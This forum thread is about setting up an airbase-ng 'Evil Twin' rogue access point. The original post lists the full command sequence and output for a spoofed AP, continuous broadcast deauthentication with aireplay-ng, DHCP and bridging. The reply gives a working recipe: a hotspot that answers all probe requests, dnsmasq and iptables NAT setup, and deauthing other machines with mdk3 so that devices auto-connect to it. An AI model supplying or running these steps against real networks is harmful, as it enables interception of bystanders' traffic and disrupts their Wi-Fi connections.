Jump to content

Airbase-ng AP doesn't let my victim connect


asciighost

Recommended Posts

I have been working around the Evil Twin Airbase-ng for quite a while and i am unable to get my victim PC which is my other windows 10 machine to connect; It did connect to the AP once(rarely) and when it did it had no internet connect which has kept me up for sometime, i am going to post the proccess i have performed please go through them and guide me through the issue.

Note:i have tried iptables and echo 1 it didnt help

Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode
airmon-ng start wlan0

Checking for background proccesses that can interfere with the work
airmon-ng check wlan0mon(assigned new name)

Setting up the Fake AP
airbase-ng -a 72:02:71:73:0D:B6 --essid Ryan -c 1 wlan0mon
17:19:25 Created tap interface at0
17:19:25 Trying to set MTU on at0 to 1500
17:19:25 Trying to set MTU on wlan0mon to 1800
17:19:25 Access Point with BSSID 72:02:71:73:0D:B6 started.
17:19:40 Client D0:13:FD:07:79:07 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:41 Client 20:16:D8:F4:0D:98 associated (WPA2;CCMP) to ESSID: "Ryan"
17:19:57 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"
17:20:03 Client 20:16:D8:F4:0D:98 associated (unencrypted) to ESSID: "Ryan"

 

Deauthorizing clients on another terminal

aireplay-ng -0 0 -a 72:02:71:73:0D:B6 wlan0mon
17:22:11 Waiting for beacon frame (BSSID: 72:02:71:73:0D:B6) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:11 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:12 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:13 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:14 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6
17:22:15 Sending DeAuth to broadcast -- BSSID: 72:02:71:73:0D:B6

Installing DHCP server
apt-get install isc-dhcp-server
Reading package lists... Done
Building dependency tree
Reading state information... Done
isc-dhcp-server is already the newest version (4.3.5-3+b1).
The following packages were automatically installed and are no longer required:
casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140
libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2
libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160
libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0
libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5
libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5
libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5
libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3
libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18
libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0
libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1
maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn
python3.5 python3.5-minimal tcpd
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Configuring nano /etc/dhcp/dhcpd.conf

authoritative;
subnet 192.168.1.0 netmask 255.255.255.0
{

option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8;
range 192.168.1.10 192.168.1.200;
default-lease-time 600;
max-lease-time 7200;

 

}

Installing bridging utilities

apt-get install bridge-utils
Reading package lists... Done
Building dependency tree
Reading state information... Done
bridge-utils is already the newest version (1.5-14).
The following packages were automatically installed and are no longer required:
casefile dconf-editor dconf-tools dissy gir1.2-nm-1.0 libbind9-140
libblas-common libcdio-cdda1 libcdio-paranoia1 libcdio13 libdns162 libemu2
libfwupd1 libgom-1.0-common libgtkspell3-3-0 libhttp-parser2.1 libisc160
libisccfg140 libllvm3.9 liblouis12 liblwgeom-2.3-0 libmozjs-24-0
libopencv-calib3d2.4v5 libopencv-core2.4v5 libopencv-features2d2.4v5
libopencv-flann2.4v5 libopencv-highgui2.4-deb0 libopencv-imgproc2.4v5
libopencv-objdetect2.4v5 libopencv-video2.4v5 libpython3.5
libpython3.5-minimal libpython3.5-stdlib libqcustomplot1.3
libqgis-core2.14.18 libqgis-gui2.14.18 libqgis-networkanalysis2.14.18
libqgispython2.14.18 libradare2-1.6 libtracker-control-1.0-0
libtracker-miner-1.0-0 libtracker-sparql-1.0-0 libva-drm1 libva-x11-1 libva1
maltegoce peepdf python-brotlipy python-pylibemu python-rsvg python-unicorn
python3.5 python3.5-minimal tcpd
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 30 not upgraded.

Bridging interface
root@kali:~# brctl addbr evil \\Name of the bridge i made
root@kali:~# brctl addif evil eth0 \\my ethernet connection
root@kali:~# brctl addif evil at0
root@kali:~# ifconfig at0 0.0.0.0 up
root@kali:~# ifconfig evil up
Starting DHCP server
root@kali:~# systemctl start smbd.service
root@kali:~# dhclient evil

root@kali:~# service isc-dhcp-server restart
root@kali:~# service isc-dhcp-server status
? isc-dhcp-server.service - LSB: DHCP server
Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled)
Active: active (running) since Wed 2017-12-06 17:32:35 EST; 6s ago
Docs: man:systemd-sysv-generator(8)
Process: 2049 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=0/SUCCESS)
Tasks: 1 (limit: 4915)
CGroup: /system.slice/isc-dhcp-server.service
+-2061 /usr/sbin/dhcpd -4 -q -cf /etc/dhcp/dhcpd.conf eth0

Dec 06 17:32:33 kali systemd1: Starting LSB: DHCP server...
Dec 06 17:32:33 kali isc-dhcp-server2049: Launching IPv4 server only.
Dec 06 17:32:33 kali dhcpd2060: Wrote 11 leases to leases file.
Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same subnet: eth0 evil
Dec 06 17:32:33 kali dhcpd2060: Multiple interfaces match the same shared network: eth0 evil
Dec 06 17:32:33 kali dhcpd2061: Server starting service.
Dec 06 17:32:35 kali isc-dhcp-server2049: Starting ISC DHCPv4 server: dhcpd.
Dec 06 17:32:35 kali systemd1: Started LSB: DHCP server.

 

/etc/init.d/isc-dhcp-server start
ok Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.

IP gateway

root@kali:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.1.1 0.0.0.0 UG 600 0 0 wlan0
192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.1.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0

Link to comment
Share on other sites

I use airbase-ng as a quick generic hotspot, it works with almost any wifi card. airbase-ng can also be used to spoof all probe requests with the use of -P -c 30

 

lets assume you have 2 devices.

 

One device is simply your internet source and the second device will be your evil hotspot.

 

I will assume your already connected to the internet with device 1. It can be a wifi connection or Ethernet...(eth0) in this example.

 

echo 'interface=at0' > /etc/dnsmasq.conf
echo 'dhcp-range=192.168.69.50,192.168.69.150,12h' >> /etc/dnsmasq.conf

airmon-ng start wlan0

airbase-ng -P -c 30 wlan0mon

[Open new console]

ifconfig at0 up 192.168.69.1

dnsmasq

 

iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

 

you will need to change eth0 to the proper internet device name.

at this point if you check ifconfig, you should see at0 has ip address of 192.168.69.1 and you should have 2 process running (airbase-ng) and (dnsmasq)

 

you can now deauth other machines( I would use mdk3 for deauth) if the machine is outdated enough it will auto connect to your airbase-ng assuming that signal strength is higher. 

 

edit. you may also need to service stop network-mamager 

Edited by i8igmac
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...